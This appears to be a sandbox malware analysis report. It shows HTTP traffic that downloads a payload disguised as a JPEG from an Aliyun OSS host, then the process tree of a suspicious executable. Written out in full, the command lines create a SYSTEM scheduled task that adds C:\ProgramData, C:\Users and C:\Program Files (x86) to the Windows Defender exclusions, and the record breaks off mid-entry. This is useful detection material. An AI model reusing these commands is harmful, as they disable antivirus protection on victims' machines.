2025-01-13 01:07:11 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 01:07:11 GMT Content-Type: image/jpeg Content-Length: 55085 Connection: close x-oss-request-id: 6784673F07D4B93534C1D137 Accept-Ranges: bytes ETag: "DC44AE348E6A74B3A74871020FDFAC74" Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12339968747348072397 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 3ESuNI5qdLOnSHECD9+sdA== x-oss-server-time: 31
2025-01-13 01:07:11 UTC	3549	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-13 01:07:11 UTC	4096	IN	Data Raw: 7c 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f Data Ascii: \|\|{Atwutse>4HYAVVSRt2Q\|(M8B&0:*)TW"TDn2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
2025-01-13 01:07:11 UTC	4096	IN	Data Raw: f7 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa Data Ascii: FG2<L\"h((JIr0SCF4=8;987@3A>s](Sn&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
2025-01-13 01:07:11 UTC	4096	IN	Data Raw: f7 b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn{75\|?flLOIVw)`]b hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
2025-01-13 01:07:11 UTC	4096	IN	Data Raw: c6 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b Data Ascii: xryQGT_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALri.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{\|}{
2025-01-13 01:07:11 UTC	4096	IN	Data Raw: 7d 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b Data Ascii: }PQT@'Bed^%]\[.n/RQPw_GFEC6:9FQ4( "pI$et)3q}Y/IZ!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}
2025-01-13 01:07:11 UTC	4096	IN	Data Raw: f0 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 Data Ascii: yv#{wofKlY%'\JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u`vRP;\Xf b$m-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
2025-01-13 01:07:11 UTC	4096	IN	Data Raw: f7 ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
2025-01-13 01:07:11 UTC	4096	IN	Data Raw: 82 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-C.G!"#$g()+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{\|
2025-01-13 01:07:11 UTC	4096	IN	Data Raw: ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~o

Target ID:	0
Start time:	20:05:07
Start date:	12/01/2025
Path:	C:\Users\user\Desktop\13478674376-78423498.01.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\13478674376-78423498.01.exe"
Imagebase:	0x140000000
File size:	31'171'152 bytes
MD5 hash:	CB04CDA738077EA40A31EA0ECFDEDD43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	20:06:51
Start date:	12/01/2025
Path:	C:\Users\user\Documents\4mPVjj.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\4mPVjj.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	20:06:53
Start date:	12/01/2025
Path:	C:\Users\user\Documents\4mPVjj.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\4mPVjj.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	20:07:03
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6b6950000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	20:07:03
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	20:07:04
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff6b8360000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	20:07:04
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff6b8360000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	20:07:04
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6b6950000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	20:07:04
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6b8360000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	20:07:04
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	20:07:04
Start date:	12/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7cc810000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	20:07:05
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6b6950000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	20:07:05
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	20:07:05
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff6b8360000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	20:07:05
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff6b8360000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	20:07:05
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6b6950000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	20:07:05
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6b8360000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	20:07:05
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	20:07:05
Start date:	12/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7cc810000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	20:07:06
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6b6950000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	20:07:06
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	20:07:06
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff6b8360000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	20:07:06
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff6b8360000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	20:07:06
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6b6950000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	20:07:06
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	20:07:06
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6b8360000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	20:07:06
Start date:	12/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7cc810000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	20:07:07
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
